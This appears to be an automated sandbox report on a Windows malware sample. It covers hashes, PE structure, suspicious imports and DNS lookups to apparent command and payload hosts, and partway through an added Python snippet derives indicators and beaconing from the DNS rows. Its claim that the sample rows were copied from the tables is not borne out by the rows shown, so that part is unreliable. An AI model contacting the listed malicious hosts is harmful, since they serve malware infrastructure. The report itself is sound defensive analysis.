                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3773
                                                                              Entropy (8bit):4.7109073551842435
                                                                              Encrypted:false
                                                                              SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                              MD5:DA3247A302D70819F10BCEEBAF400503
                                                                              SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                              SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                              SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.038426150867094
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:V91yW08J6p.exe
                                                                              File size:284672
                                                                              MD5:d609a21245d77dccd6d4a659cbd9466a
                                                                              SHA1:a8775ccb1d6b7b941e5b37d59db5d25f4b736cf9
                                                                              SHA256:a0f70f88c9a376e7c0f7e508c796bf1dbbf58ff8b172b9aff3421be63e2d7f78
                                                                              SHA512:771e118945bc4c544312c67e568d0d9bab8138573d31cb3f4e81626978eb77fa472eb49e84f67e79da15e45f5c90b8a1bc2ead9bafd8b9fcf7b7455f4917d47d
                                                                              SSDEEP:3072:WuIvZ9KEbLnAALxvRs7uCoorI90O3manWxULkIFueWrxpzbgqru:WrPKOnvA7uIrUJY0kIFueuzbgwu

                                                                              File Icon

                                                                              Icon Hash:acfc36b6b694c6e2

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x402ed7
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x60797181 [Fri Apr 16 11:14:09 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:6aeb06b4ccc41eb437631c770949cf13

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007FC204F50E6Fh
                                                                              jmp 00007FC204F4B42Dh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              test ecx, 00000003h
                                                                              je 00007FC204F4B5D6h
                                                                              mov al, byte ptr [ecx]
                                                                              add ecx, 01h
                                                                              test al, al
                                                                              je 00007FC204F4B600h
                                                                              test ecx, 00000003h
                                                                              jne 00007FC204F4B5A1h
                                                                              add eax, 00000000h
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              mov eax, dword ptr [ecx]
                                                                              mov edx, 7EFEFEFFh
                                                                              add edx, eax
                                                                              xor eax, FFFFFFFFh
                                                                              xor eax, edx
                                                                              add ecx, 04h
                                                                              test eax, 81010100h
                                                                              je 00007FC204F4B59Ah
                                                                              mov eax, dword ptr [ecx-04h]
                                                                              test al, al
                                                                              je 00007FC204F4B5E4h
                                                                              test ah, ah
                                                                              je 00007FC204F4B5D6h
                                                                              test eax, 00FF0000h
                                                                              je 00007FC204F4B5C5h
                                                                              test eax, FF000000h
                                                                              je 00007FC204F4B5B4h
                                                                              jmp 00007FC204F4B57Fh
                                                                              lea eax, dword ptr [ecx-01h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-02h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-03h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-04h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              mov edi, edi
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 20h
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              push esi
                                                                              push edi
                                                                              push 00000008h
                                                                              pop ecx
                                                                              mov esi, 004132F8h
                                                                              lea edi, dword ptr [ebp-20h]
                                                                              rep movsd
                                                                              mov dword ptr [ebp-08h], eax
                                                                              mov eax, dword ptr [ebp+0Ch]
                                                                              pop edi
                                                                              mov dword ptr [ebp-04h], eax

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 build 21022
                                                                              • [LNK] VS2008 build 21022
                                                                              • [ASM] VS2008 build 21022
                                                                              • [IMP] VS2005 build 50727
                                                                              • [RES] VS2008 build 21022
                                                                              • [C++] VS2008 build 21022

                                                                              Data Directories

                                                                               Name                                 | Virtual Address | Virtual Size | Is in Section
                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x15de8         | 0x50         | .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x3f000         | 0xe560       | .rsrc
                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x131f0         | 0x1c         | .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x150c8         | 0x40         | .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_IAT            | 0x13000         | 0x1a8        | .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                                                              Sections

                                                                               Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type    | Entropy       | Characteristics
                                                                               .text  | 0x1000          | 0x11623      | 0x11800  | False    | 0.6068359375    | data         | 6.65145087011 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                               .rdata | 0x13000         | 0x378c       | 0x3800   | False    | 0.369280133929  | SysEx File - | 5.19241956234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                               .data  | 0x17000         | 0x27ef8      | 0x21e00  | False    | 0.249409017528  | data         | 2.76625519301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                               .rsrc  | 0x3f000         | 0xe560       | 0xe600   | False    | 0.621858016304  | data         | 6.14631752789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                               Name            | RVA     | Size   | Type                                                                              | Language | Country
                                                                               RT_CURSOR       | 0x4b120 | 0x130  | data                                                                              | Spanish  | Argentina
                                                                               RT_CURSOR       | 0x4b268 | 0xea8  | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"    | Spanish  | Argentina
                                                                               RT_CURSOR       | 0x4c110 | 0x8a8  | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"    | Spanish  | Argentina
                                                                               RT_ICON         | 0x3f600 | 0xea8  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x404a8 | 0x8a8  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x40d50 | 0x6c8  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x41418 | 0x568  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x41980 | 0x25a8 | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x43f28 | 0x10a8 | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x44fd0 | 0x988  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x45958 | 0x468  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x45e38 | 0xea8  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x46ce0 | 0x8a8  | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x47588 | 0x25a8 | dBase III DBT, version number 0, next free block index 40                         | Spanish  | Argentina
                                                                               RT_ICON         | 0x49b30 | 0x10a8 | data                                                                              | Spanish  | Argentina
                                                                               RT_ICON         | 0x4abd8 | 0x468  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Argentina
                                                                               RT_DIALOG       | 0x4cb98 | 0x9c   | data                                                                              | Spanish  | Argentina
                                                                               RT_STRING       | 0x4cc38 | 0x45a  | data                                                                              | Spanish  | Argentina
                                                                               RT_STRING       | 0x4d098 | 0x1ec  | data                                                                              | Spanish  | Argentina
                                                                               RT_STRING       | 0x4d288 | 0x2d4  | data                                                                              | Spanish  | Argentina
                                                                               RT_ACCELERATOR  | 0x4b090 | 0x68   | data                                                                              | Spanish  | Argentina
                                                                               RT_ACCELERATOR  | 0x4b0f8 | 0x28   | data                                                                              | Spanish  | Argentina
                                                                               RT_GROUP_CURSOR | 0x4b250 | 0x14   | data                                                                              | Spanish  | Argentina
                                                                               RT_GROUP_CURSOR | 0x4c9b8 | 0x22   | data                                                                              | Spanish  | Argentina
                                                                               RT_GROUP_ICON   | 0x45dc0 | 0x76   | data                                                                              | Spanish  | Argentina
                                                                               RT_GROUP_ICON   | 0x4b040 | 0x4c   | data                                                                              | Spanish  | Argentina
                                                                               RT_VERSION      | 0x4c9e0 | 0x1b8  | COM executable for DOS                                                            | Spanish  | Argentina

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllGetStringTypeA, VirtualQuery, FindResourceExW, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, CompareFileTime, GetConsoleAliasesA, GetConsoleAliasesLengthA, CreateRemoteThread, SetFileTime, GlobalAlloc, TerminateThread, GetLocaleInfoW, GetVersionExW, GetFileAttributesW, GetAtomNameW, GetModuleFileNameW, ReleaseSemaphore, SetComputerNameExA, GetLastError, GetLongPathNameW, GetProcAddress, VirtualAlloc, WriteConsoleA, DnsHostnameToComputerNameA, GetFileType, HeapLock, GetModuleFileNameA, GetDefaultCommConfigA, WTSGetActiveConsoleSessionId, GetModuleHandleA, GetConsoleTitleW, ReadConsoleInputW, GetProfileSectionW, CreateThread, SetConsoleTitleA, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile, GetConsoleOutputCP, WriteConsoleW
                                                                              USER32.dllClientToScreen
                                                                              ADVAPI32.dllAdjustTokenGroups

                                                                              Version Infos

                                                                              DescriptionData
                                                                              ProjectVersion3.10.70.17
                                                                              InternationalNamebomgvioci.iwa
                                                                              CopyrightCopyrighz (C) 2021, fudkort
                                                                              Translation0x0129 0x0794

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              SpanishArgentina

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                              Jan 11, 2022 20:44:55.779691935 CET192.168.2.48.8.8.80x1c9eStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.868988037 CET192.168.2.48.8.8.80x66ccStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.010751963 CET192.168.2.48.8.8.80xdfe7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.251651049 CET192.168.2.48.8.8.80x4246Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.298286915 CET192.168.2.48.8.8.80x6942Standard query (0)noc.socialA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.393604040 CET192.168.2.48.8.8.80x5058Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.883686066 CET192.168.2.48.8.8.80x6926Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.083373070 CET192.168.2.48.8.8.80x7995Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.306257010 CET192.168.2.48.8.8.80xee0bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.525938034 CET192.168.2.48.8.8.80x89f2Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.723368883 CET192.168.2.48.8.8.80x8187Standard query (0)github.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.179241896 CET192.168.2.48.8.8.80xdc20Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.867950916 CET192.168.2.48.8.8.80x91c8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:02.099030972 CET192.168.2.48.8.8.80xc1c2Standard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:04.004987955 CET192.168.2.48.8.8.80x47e1Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.183027029 CET192.168.2.48.8.8.80xc752Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.215806961 CET192.168.2.48.8.8.80x10dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.541882038 CET192.168.2.48.8.8.80x630fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:07.744271994 CET192.168.2.48.8.8.80x3fStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:09.998613119 CET192.168.2.48.8.8.80x5821Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.669603109 CET192.168.2.48.8.8.80x9d57Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.346198082 CET192.168.2.48.8.8.80x6d85Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.431581974 CET192.168.2.48.8.8.80x7f0dStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.827282906 CET192.168.2.48.8.8.80x9971Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:16.692194939 CET192.168.2.48.8.8.80x3e8cStandard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.227754116 CET192.168.2.48.8.8.80xb587Standard query (0)dl.uploadgram.meA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.525394917 CET192.168.2.48.8.8.80x7534Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:20.992842913 CET192.168.2.48.8.8.80xb0abStandard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.398617983 CET192.168.2.48.8.8.80x472dStandard query (0)yandex.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:33.966952085 CET192.168.2.48.8.8.80xf407Standard query (0)a0620531.xsph.ruA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:46:09.989973068 CET192.168.2.48.8.8.80x8403Standard query (0)patmushta.infoA (IP address)IN (0x0001)
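The DNS rows in this section are raw capture data; what an analyst wants from them is a per-domain indicator list, the names that never resolved, query-to-answer latency per transaction ID, and the re-query cadence that distinguishes a polling loop from one-off lookups (host-data-coin-11.com is re-queried at sub-second intervals throughout the capture). The following is an added example, not part of the Joe Sandbox report: RECORDS is a hand-built sample constructed from a few of the query and answer entries in this section (timestamps, transaction IDs, names, reply codes and addresses copied as they appear), not a re-export of the full tables, and the thresholds in beacon_candidates are assumptions chosen for this sample.

```python
"""Turn sandbox DNS query/answer rows into per-domain indicators.

Added example, not part of the Joe Sandbox report. RECORDS is constructed
from a handful of the entries in this section; it is sample input, not a
re-export of the full tables.
"""
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta
from statistics import median

# "Jan 11, 2022 20:44:42.227250099 CET": nine fractional digits, but datetime
# only carries microseconds, so the fraction is truncated to six digits.
TS_RE = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) [A-Z]+$")

def parse_ts(ts):
    """Parse a report timestamp into a naive datetime (the zone suffix is ignored)."""
    m = TS_RE.match(ts)
    if not m:
        raise ValueError(f"unparseable timestamp: {ts!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    micros = int(m.group(2)[:6].ljust(6, "0"))
    return base + timedelta(microseconds=micros)

# kind is "query" or "answer"; address is None for queries and the literal
# "none" where the report shows none (a SERVFAIL reply carries no address).
Record = namedtuple("Record", "ts txid kind name rcode address")
D, Q, OK = "Jan 11, 2022 ", "Standard query (0)", "No error (0)"
RECORDS = [  # constructed from entries in this section
    Record(D + "20:44:42.227250099 CET", "0xbbc7", "query", "host-data-coin-11.com", Q, None),
    Record(D + "20:44:42.246131897 CET", "0xbbc7", "answer", "host-data-coin-11.com", OK, "5.188.88.184"),
    Record(D + "20:44:42.467854977 CET", "0x4694", "query", "host-data-coin-11.com", Q, None),
    Record(D + "20:44:42.484822989 CET", "0x4694", "answer", "host-data-coin-11.com", OK, "5.188.88.184"),
    Record(D + "20:44:42.684598923 CET", "0xe569", "query", "goo.su", Q, None),
    Record(D + "20:44:42.714019060 CET", "0xe569", "answer", "goo.su", OK, "172.67.139.105"),
    Record(D + "20:44:42.714019060 CET", "0xe569", "answer", "goo.su", OK, "104.21.38.221"),
    Record(D + "20:44:43.212213993 CET", "0xdce1", "query", "host-data-coin-11.com", Q, None),
    Record(D + "20:44:43.231197119 CET", "0xdce1", "answer", "host-data-coin-11.com", OK, "5.188.88.184"),
    Record(D + "20:44:43.435756922 CET", "0x11eb", "query", "goo.su", Q, None),
    Record(D + "20:44:43.467884064 CET", "0x11eb", "answer", "goo.su", OK, "104.21.38.221"),
    Record(D + "20:44:43.467884064 CET", "0x11eb", "answer", "goo.su", OK, "172.67.139.105"),
    Record(D + "20:44:44.382760048 CET", "0xf098", "query", "host-data-coin-11.com", Q, None),
    Record(D + "20:44:44.694936991 CET", "0xf098", "answer", "host-data-coin-11.com", OK, "5.188.88.184"),
    Record(D + "20:44:44.899312973 CET", "0x469c", "query", "transfer.sh", Q, None),
    Record(D + "20:44:44.918253899 CET", "0x469c", "answer", "transfer.sh", OK, "144.76.136.153"),
    Record(D + "20:44:45.074127913 CET", "0x968e", "query", "host-data-coin-11.com", Q, None),
    Record(D + "20:44:45.091128111 CET", "0x968e", "answer", "host-data-coin-11.com", OK, "5.188.88.184"),
    # Reply whose query lies before the rows quoted in this section.
    Record(D + "20:44:36.377810955 CET", "0x5388", "answer", "srtuiyhuali.at", "Server failure (2)", "none"),
]

def resolved_addresses(records):
    """name -> sorted distinct addresses from successful answers (the IOC list)."""
    out = defaultdict(set)
    for r in records:
        if r.kind == "answer" and r.rcode.startswith("No error") and r.address not in (None, "none"):
            out[r.name].add(r.address)
    return {name: sorted(addrs) for name, addrs in out.items()}

def failed_names(records):
    """Names that never resolved: every answer carries a non-zero reply code.
    Such a name is still an indicator; the sample asked for it."""
    codes = defaultdict(set)
    for r in records:
        if r.kind == "answer":
            codes[r.name].add(r.rcode)
    return sorted(n for n, c in codes.items() if not any(x.startswith("No error") for x in c))

def answer_latency(records):
    """txid -> seconds from query to its first answer, or None if no answer was seen."""
    queries = {r.txid: parse_ts(r.ts) for r in records if r.kind == "query"}
    first = {}
    for r in records:
        if r.kind == "answer" and r.txid in queries:
            t = parse_ts(r.ts)
            first[r.txid] = min(first.get(r.txid, t), t)
    return {tx: (round((first[tx] - q).total_seconds(), 6) if tx in first else None)
            for tx, q in queries.items()}

def query_intervals(records, name):
    """Seconds between consecutive queries for `name`, in time order."""
    times = sorted(parse_ts(r.ts) for r in records if r.kind == "query" and r.name == name)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]

def beacon_candidates(records, min_queries=3, max_median_gap=2.0):
    """Names re-queried at a short, steady cadence: name -> median gap in seconds.
    Thresholds are assumptions for this sample; tune them per capture length."""
    hits = {}
    for name in {r.name for r in records if r.kind == "query"}:
        gaps = query_intervals(records, name)
        if len(gaps) + 1 < min_queries:  # too few queries to call it a cadence
            continue
        med = median(gaps)
        if med <= max_median_gap:
            hits[name] = round(med, 3)
    return hits
```

Run on the sample, resolved_addresses yields one address for host-data-coin-11.com and two for goo.su, failed_names returns srtuiyhuali.at (server failure, no address), and beacon_candidates flags only host-data-coin-11.com, re-queried five times with a median gap of about 0.72 s; goo.su and transfer.sh are queried too rarely to be called a cadence. The same functions run unchanged over a full export once each row has been split into a Record.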

                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 11, 2022 20:43:46.665888071 CET | 8.8.8.8 | 192.168.2.4 | 0xa8a5 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:46.895819902 CET | 8.8.8.8 | 192.168.2.4 | 0xcc98 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:51.154884100 CET | 8.8.8.8 | 192.168.2.4 | 0x1c28 | Server failure (2) | privacytools-foryou-777.com | none | none | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:51.483428955 CET | 8.8.8.8 | 192.168.2.4 | 0x6ed0 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:52.095397949 CET | 8.8.8.8 | 192.168.2.4 | 0x107f | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:52.122339010 CET | 8.8.8.8 | 192.168.2.4 | 0x1c28 | Server failure (2) | privacytools-foryou-777.com | none | none | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:52.315399885 CET | 8.8.8.8 | 192.168.2.4 | 0xdfe0 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:52.953062057 CET | 8.8.8.8 | 192.168.2.4 | 0x1462 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:53.154812098 CET | 8.8.8.8 | 192.168.2.4 | 0x1c28 | Server failure (2) | privacytools-foryou-777.com | none | none | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:54.397541046 CET | 8.8.8.8 | 192.168.2.4 | 0x1f2a | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:55.194344997 CET | 8.8.8.8 | 192.168.2.4 | 0x1c28 | Server failure (2) | privacytools-foryou-777.com | none | none | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:55.562896013 CET | 8.8.8.8 | 192.168.2.4 | 0x5564 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:56.088010073 CET | 8.8.8.8 | 192.168.2.4 | 0xae61 | No error (0) | data-host-coin-8.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:58.352391005 CET | 8.8.8.8 | 192.168.2.4 | 0x773f | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:58.881081104 CET | 8.8.8.8 | 192.168.2.4 | 0xcba3 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:59.099597931 CET | 8.8.8.8 | 192.168.2.4 | 0xe5a9 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:59.449680090 CET | 8.8.8.8 | 192.168.2.4 | 0x5467 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:59.679265022 CET | 8.8.8.8 | 192.168.2.4 | 0xb7ce | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:59.913012028 CET | 8.8.8.8 | 192.168.2.4 | 0xfc43 | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:43:59.992465019 CET | 8.8.8.8 | 192.168.2.4 | 0xb2d | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:00.857527018 CET | 8.8.8.8 | 192.168.2.4 | 0xea83 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:01.094856024 CET | 8.8.8.8 | 192.168.2.4 | 0x8d1 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:01.336083889 CET | 8.8.8.8 | 192.168.2.4 | 0xfd8e | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:01.885543108 CET | 8.8.8.8 | 192.168.2.4 | 0xdcdc | No error (0) | data-host-coin-8.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:04.577234030 CET | 8.8.8.8 | 192.168.2.4 | 0xa653 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:04.809919119 CET | 8.8.8.8 | 192.168.2.4 | 0x6aa5 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
